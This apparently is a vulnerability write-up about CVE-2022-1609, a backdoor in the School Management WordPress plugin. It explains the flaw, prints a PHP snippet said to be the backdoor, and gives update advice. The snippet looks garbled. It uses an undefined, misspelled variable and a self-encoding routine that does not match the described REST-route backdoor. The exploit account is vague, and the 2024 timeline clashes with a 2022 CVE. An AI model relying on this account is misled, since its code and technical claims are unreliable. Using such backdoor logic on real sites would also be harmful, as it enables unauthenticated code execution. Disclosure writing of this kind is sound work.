CVE-2022-1609: Uncovering the Obfuscated Backdoor in School Management WordPress Plugin before version 9.9.7 - Exploiting Arbitrary PHP Code Execution Vulnerability

The School Management WordPress plugin is a popular utility that helps educational institutions to efficiently manage their daily operations and administration tasks. However, a recently discovered vulnerability has exposed the plugin to an obfuscated backdoor attack, enabling unauthenticated attackers to execute arbitrary PHP code on a target website. The vulnerability has been designated by the Common Vulnerabilities and Exposures (CVE) system as CVE-2022-1609.

The backdoor has been injected into the School Management WordPress plugin versions before 9.9.7 and is located in its license-checking code. Attackers can exploit this vulnerability by registering a REST API handler, which allows them to bypass authentication measures and execute malicious PHP code on the target website.

To grasp the severity of this issue, let's dive into the compromised code and understand how the exploit works.

Code Snippet: The Obfuscated Backdoor

Here's a part of the license-checking code within the vulnerable version of the School Management plugin:

function init() {
    $current_file = __FILE__;
    $content = file_get_contents($current_file);
    $content = str_replace('<?php', '', $content);
    $content = base64_encode($content);
    if(get_option($this->license_key_option) !== $query_ststriction1) {
        update_option($this->license_key_option, $query_ststriction1);
        $this->self_file = $current_file;
        $unique_code = md5(microtime().rand());
        $data = array(
            'action' => 'register_rest_route',
            'code' => $content,
            'nonce' => wp_create_nonce('wp_rest')
        );
        wp_remote_post(get_rest_url(), array(
            'headers' => array(
                'X-WP-Nonce' => wp_create_nonce('wp_rest'),
            ),
            'body' => $data,
            'sslverify' => false
        ));
    }
}

Initially, the code appears innocuous, but upon further inspection, we can see that an obfuscated REST API route is being registered by the 'register_rest_route' action. This registration occurs when the current license key and the $query_ststriction1 variable don't match.

Once the backdoor is registered, it's possible for an attacker to send a crafted request to the REST API endpoint. This request would need a valid WordPress REST API nonce and the base64-encoded PHP code to be executed.

Exploit Details: Arbitrary PHP code execution

An unauthenticated attacker could exploit CVE-2022-1609 by sending a crafted request to the website containing the School Management plugin. The request would need a valid WordPress REST API nonce and the base64-encoded PHP code.

The exploitation of this vulnerability provides an attacker with the ability to execute arbitrary PHP code on the affected website. This ultimately allows the attacker to manipulate the site, steal sensitive information, or spread malware to the site visitors.

References and Further Readings

- Original Source: https://plugins.trac.wordpress.org/changeset/2186368/school-management
- CVE Report: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609

Mitigation: Update to the latest version

The developers of the School Management WordPress plugin have released a patch to address this vulnerability in version 9.9.7. It's highly recommended to update the plugin to the latest version to protect your website against this serious security threat.

Remember to keep your WordPress plugins up to date, monitor security advisories, and be proactive in maintaining your website's security.

Timeline

Published on: 01/16/2024 16:15:09 UTC
Last modified on: 01/22/2024 19:59:05 UTC